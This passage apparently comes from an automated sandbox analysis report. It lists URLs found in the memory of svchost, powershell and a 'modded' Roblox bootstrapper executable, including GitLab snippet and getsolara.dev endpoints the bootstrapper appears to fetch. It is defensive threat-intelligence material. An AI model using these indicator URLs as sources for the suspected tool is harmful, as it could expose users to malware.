                          Source: svchost.exe, 0000000E.00000003.1560487020.0000029107563000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1560378922.000002910753B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.2614257252.0000029106C5F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1560434401.0000029107540000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80601
                          Source: svchost.exe, 0000000E.00000003.1560487020.0000029107563000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1560378922.000002910753B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.2614257252.0000029106C5F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1560434401.0000029107540000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80603
                          Source: svchost.exe, 0000000E.00000003.1560487020.0000029107563000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.2614257252.0000029106C5F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80604
                          Source: svchost.exe, 0000000E.00000003.1560487020.0000029107563000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.2614257252.0000029106C5F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80605
                          Source: svchost.exe, 0000000E.00000003.1560409249.0000029107557000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1560378922.000002910753B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1561328652.000002910752A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1560202919.0000029107552000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1560434401.0000029107540000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://account.live.com/msangcwam
                          Source: svchost.exe, 0000000E.00000002.2614010302.0000029106C45000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://account.live.com/msangcwamvice
                          Source: powershell.exe, 00000005.00000002.1448022364.000001A9873F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1513924048.000001D5D16F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1664458722.000001D200001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1886459813.000001B863871000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore68
                          Source: BootstrapperV1.23_ModdedByHisako.exe, 00000003.00000000.1364148656.0000022EC9D72000.00000002.00000001.01000000.00000007.sdmp, BootstrapperV1.23_ModdedByHisako.exe, 00000003.00000002.1690390446.0000022ECBBD6000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.23_ModdedByHisako.exe.0.dr | String found in binary or memory: https://aka.ms/vs/17/release/vc_redist.x64.exe
                          Source: BootstrapperV1.23_ModdedByHisako.exe, 00000003.00000002.1690390446.0000022ECBBD6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://clientsettings.roblox.com
                          Source: BootstrapperV1.23_ModdedByHisako.exe, 00000003.00000002.1690390446.0000022ECBBD6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://clientsettings.roblox.com/v2/client-version/WindowsPlayer/channel/live
                          Source: powershell.exe, 00000013.00000002.2049620309.000001B8738DD000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/
                          Source: powershell.exe, 00000013.00000002.2049620309.000001B8738DD000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon
                          Source: powershell.exe, 00000013.00000002.2049620309.000001B8738DD000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License
                          Source: BootstrapperV1.23_ModdedByHisako.exe, 00000003.00000002.1690390446.0000022ECBA41000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://discord.com
                          Source: BootstrapperV1.23_ModdedByHisako.exe, 00000003.00000000.1364148656.0000022EC9D72000.00000002.00000001.01000000.00000007.sdmp, BootstrapperV1.23_ModdedByHisako.exe.0.dr | String found in binary or memory: https://discord.com;http://127.0.0.1:6463/rpc?v=11
                          Source: BootstrapperV1.23_ModdedByHisako.exe, 00000003.00000002.1690390446.0000022ECBA41000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.23_ModdedByHisako.exe, 00000003.00000002.1690390446.0000022ECBAE2000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.23_ModdedByHisako.exe, 00000003.00000002.1690390446.0000022ECBB4F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://getsolara.dev
                          Source: BootstrapperV1.23_ModdedByHisako.exe, 00000003.00000002.1690390446.0000022ECBA41000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.23_ModdedByHisako.exe, 00000003.00000000.1364148656.0000022EC9D72000.00000002.00000001.01000000.00000007.sdmp, BootstrapperV1.23_ModdedByHisako.exe, 00000003.00000002.1690390446.0000022ECBB4F000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.23_ModdedByHisako.exe.0.dr | String found in binary or memory: https://getsolara.dev/api/endpoint.json
                          Source: BootstrapperV1.23_ModdedByHisako.exe, 00000003.00000002.1690390446.0000022ECBA41000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.23_ModdedByHisako.exe, 00000003.00000000.1364148656.0000022EC9D72000.00000002.00000001.01000000.00000007.sdmp, BootstrapperV1.23_ModdedByHisako.exe.0.dr | String found in binary or memory: https://getsolara.dev/asset/discord.json
                          Source: powershell.exe, 00000013.00000002.1886459813.000001B863A99000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester
                          Source: BootstrapperV1.23_ModdedByHisako.exe, 00000003.00000002.1690390446.0000022ECBA41000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.23_ModdedByHisako.exe, 00000003.00000000.1364148656.0000022EC9D72000.00000002.00000001.01000000.00000007.sdmp, BootstrapperV1.23_ModdedByHisako.exe.0.dr | String found in binary or memory: https://gitlab.com/cmd-softworks1/a/-/snippets/4768754/raw/main/endpoint.json
                          Source: BootstrapperV1.23_ModdedByHisako.exe, 00000003.00000002.1690390446.0000022ECBA41000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.23_ModdedByHisako.exe, 00000003.00000000.1364148656.0000022EC9D72000.00000002.00000001.01000000.00000007.sdmp, BootstrapperV1.23_ModdedByHisako.exe.0.dr | String found in binary or memory: https://gitlab.com/cmd-softworks1/a/-/snippets/4768756/raw/main/discord.json
                          Source: svchost.exe, 0000000E.00000003.1560487020.0000029107563000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.2614257252.0000029106C5F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.2614010302.0000029106C45000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/ApproveSession.srf
                          Source: svchost.exe, 0000000E.00000003.1560378922.000002910753B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1560434401.0000029107540000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/ApproveSession.srfe.com
                          Source: svchost.exe, 0000000E.00000003.1560202919.0000029107552000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1561197433.0000029107556000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&amp;id=80600
                          Source: svchost.exe, 0000000E.00000003.1560202919.0000029107552000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1561197433.0000029107556000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&amp;id=80601
                          Source: svchost.exe, 0000000E.00000003.1560487020.0000029107563000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1560548013.000002910756B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.2614257252.0000029106C5F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&id=80502
                          Source: svchost.exe, 0000000E.00000003.1560487020.0000029107563000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1560548013.000002910756B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.2614257252.0000029106C5F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&id=80600
                          Source: svchost.exe, 0000000E.00000003.1560487020.0000029107563000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1560548013.000002910756B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.2614257252.0000029106C5F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&id=80601
                          Source: svchost.exe, 0000000E.00000003.1560378922.000002910753B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1560434401.0000029107540000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.2614010302.0000029106C45000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/ListSessions.srf
                          Source: svchost.exe, 0000000E.00000002.2614010302.0000029106C45000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/ManageAp
                          Source: svchost.exe, 0000000E.00000002.2614010302.0000029106C45000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/ManageApcfg:
                          Source: svchost.exe, 0000000E.00000003.1560487020.0000029107563000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.2614257252.0000029106C5F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ManageApprover.srf
                          Source: svchost.exe, 0000000E.00000003.1560378922.000002910753B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1560434401.0000029107540000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ManageApprover.srf53457
                          Source: svchost.exe, 0000000E.00000002.2614010302.0000029106C45000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ManageLogin
                          Source: svchost.exe, 0000000E.00000003.1560487020.0000029107563000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1560378922.000002910753B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.2614257252.0000029106C5F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1560434401.0000029107540000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ManageLoginKeys.srf
                          Source: svchost.exe, 0000000E.00000002.2614689488.0000029106CB7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.2614257252.0000029106C5F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.2616206902.0000029107A59000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.2615972777.0000029107A13000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/RST2.srf
                          Source: svchost.exe, 0000000E.00000003.1560378922.000002910753B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1560434401.0000029107540000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.2614010302.0000029106C45000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/didtou.srf
                          Source: svchost.exe, 0000000E.00000003.1560378922.000002910753B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1560434401.0000029107540000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.2614010302.0000029106C45000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/getrealminfo.srf
                          Source: svchost.exe, 0000000E.00000003.1560378922.000002910753B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1560434401.0000029107540000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.2614010302.0000029106C45000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/getuserrealm.srf
                          Source: svchost.exe, 0000000E.00000003.1561197433.0000029107556000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsec
                          Source: svchost.exe, 0000000E.00000002.2614010302.0000029106C45000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/DeviceAssociate.srf
                          Source: svchost.exe, 0000000E.00000003.1560487020.0000029107563000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1560548013.000002910756B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/DeviceDisassociate.srf
                          Source: svchost.exe, 0000000E.00000002.2614010302.0000029106C45000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/DeviceDisassociate.srf0
                          Source: svchost.exe, 0000000E.00000003.1560378922.000002910753B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.2614257252.0000029106C5F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1560434401.0000029107540000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/DeviceQuery.srf
                          Source: svchost.exe, 0000000E.00000003.1560487020.0000029107563000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1560548013.000002910756B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/DeviceUpdate.srf
                          Source: svchost.exe, 0000000E.00000002.2614010302.0000029106C45000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/DeviceUpdate.srfD
                          Source: svchost.exe, 0000000E.00000003.1560487020.0000029107563000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1560548013.000002910756B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.2614257252.0000029106C5F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/EnumerateDevices.srf
                          Source: svchost.exe, 0000000E.00000003.1560378922.000002910753B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.2614257252.0000029106C5F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1560434401.0000029107540000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/GetAppData.srf
                          Source: svchost.exe, 0000000E.00000002.2614010302.0000029106C45000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/GetAppData.srfrfrf6085fid=cpsrf
                          Source: svchost.exe, 0000000E.00000003.1560487020.0000029107563000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1560548013.000002910756B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.2614257252.0000029106C5F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/GetUserKeyData.srf
                          Source: svchost.exe, 0000000E.00000003.1560487020.0000029107563000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1560548013.000002910756B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1561328652.000002910752A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.2614257252.0000029106C5F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineClientAuth.srf
                          Source: svchost.exe, 0000000E.00000003.1560487020.0000029107563000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1560378922.000002910753B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.2614257252.0000029106C5F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1560202919.0000029107552000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1561197433.0000029107556000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1560434401.0000029107540000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineConnect.srf?id=80600
                          Source: svchost.exe, 0000000E.00000003.1560487020.0000029107563000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1560378922.000002910753B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.2614257252.0000029106C5F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1560202919.0000029107552000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1561197433.0000029107556000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1560434401.0000029107540000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineConnect.srf?id=80601
                          Source: svchost.exe, 0000000E.00000003.1560487020.0000029107563000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1560378922.000002910753B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.2614257252.0000029106C5F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1561197433.0000029107556000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1560434401.0000029107540000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.2614010302.0000029106C45000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineConnect.srf?id=80603
                          Source: svchost.exe, 0000000E.00000003.1560487020.0000029107563000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1561328652.000002910752A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.2614257252.0000029106C5F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1560202919.0000029107552000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1561197433.0000029107556000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineConnect.srf?id=80604
                          Source: svchost.exe, 0000000E.00000003.1560487020.0000029107563000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1560548013.000002910756B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.2614257252.0000029106C5F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineDesktop.srf
                          Source: svchost.exe, 0000000E.00000003.1561328652.000002910752A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineDesktop.srfm
                          Source: svchost.exe, 0000000E.00000003.1560487020.0000029107563000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.2614010302.0000029106C45000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80502
                          Source: svchost.exe, 0000000E.00000003.1560378922.000002910753B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1560434401.0000029107540000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=805024
                          Source: svchost.exe, 0000000E.00000003.1560487020.0000029107563000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1560378922.000002910753B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1560434401.0000029107540000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.2614010302.0000029106C45000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80600
                          Source: svchost.exe, 0000000E.00000003.1560487020.0000029107563000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1560378922.000002910753B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.2614257252.0000029106C5F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1560202919.0000029107552000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1561197433.0000029107556000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1560434401.0000029107540000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80601
                          Source: svchost.exe, 0000000E.00000003.1560487020.0000029107563000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1560378922.000002910753B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.2614257252.0000029106C5F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1560202919.0000029107552000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1561197433.0000029107556000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1560434401.0000029107540000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80603
                          Source: svchost.exe, 0000000E.00000003.1561197433.0000029107556000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.2614010302.0000029106C45000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80604
                          Source: svchost.exe, 0000000E.00000003.1560378922.000002910753B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1560434401.0000029107540000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=806045
                          Source: svchost.exe, 0000000E.00000003.1560487020.0000029107563000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1561328652.000002910752A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.2614257252.0000029106C5F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1560202919.0000029107552000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1561197433.0000029107556000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80605
                          Source: svchost.exe, 0000000E.00000003.1560487020.0000029107563000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1561328652.000002910752A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.2614257252.0000029106C5F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1560202919.0000029107552000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1561197433.0000029107556000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80606
                          Source: svchost.exe, 0000000E.00000003.1560487020.0000029107563000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1561328652.000002910752A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.2614257252.0000029106C5F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1560202919.0000029107552000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80607
                          Source: svchost.exe, 0000000E.00000003.1560409249.0000029107557000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1560487020.0000029107563000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1561328652.000002910752A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.2614257252.0000029106C5F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1560202919.0000029107552000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80608
                          Source: svchost.exe, 0000000E.00000003.1560202919.0000029107552000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1561197433.0000029107556000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlinePOPAuth.srf?id=80601&amp;fid=cp
                          Source: svchost.exe, 0000000E.00000003.1560181005.000002910755A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlinePOPAuth.srf?id=80601&fid=cp
                          Source: svchost.exe, 0000000E.00000002.2614010302.0000029106C45000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlinePOPAuth.srf?id=80601&fid=cpth.srf?id=80601&amp;
                          Source: svchost.exe, 0000000E.00000003.1560487020.0000029107563000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1561328652.000002910752A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.2614257252.0000029106C5F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1560202919.0000029107552000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1561197433.0000029107556000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlinePOPAuth.srf?id=80605
                          Source: svchost.exe, 0000000E.00000003.1560487020.0000029107563000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1560378922.000002910753B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.2614257252.0000029106C5F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1560434401.0000029107540000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/ResolveUser.srf
                          Source: svchost.exe, 0000000E.00000003.1560487020.0000029107563000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.2614257252.0000029106C5F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/SHA1Auth.srf
                          Source: svchost.exe, 0000000E.00000003.1560378922.000002910753B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1560434401.0000029107540000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/SHA1Auth.srfQ
                          Source: svchost.exe, 0000000E.00000002.2614010302.0000029106C45000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/deviceaddcredential.srfc
                          Source: svchost.exe, 0000000E.00000003.1560378922.000002910753B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1560434401.0000029107540000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.2614010302.0000029106C45000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/devicechangecredential.srf
                          Source: svchost.exe, 0000000E.00000003.1560487020.0000029107563000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1560378922.000002910753B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1560434401.0000029107540000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.2614010302.0000029106C45000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/deviceremovecredential.srf
                          Source: svchost.exe, 0000000E.00000002.2614010302.0000029106C45000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/resetpw.srf
                          Source: svchost.exe, 0000000E.00000003.1560378922.000002910753B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1560434401.0000029107540000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/resetpw.srff
                          Source: svchost.exe, 0000000E.00000003.1560378922.000002910753B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1560434401.0000029107540000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.2614010302.0000029106C45000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/retention.srf
                          Source: svchost.exe, 0000000E.00000002.2614824394.0000029106CE0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com:443/RST2.srf
                          Source: svchost.exe, 0000000E.00000003.1560487020.0000029107563000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1560378922.000002910753B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.2614257252.0000029106C5F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1560434401.0000029107540000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/MSARST2.srf
                          Source: svchost.exe, 0000000E.00000003.1560487020.0000029107563000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1560378922.000002910753B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1560434401.0000029107540000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.2614010302.0000029106C45000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceAssociate.srf
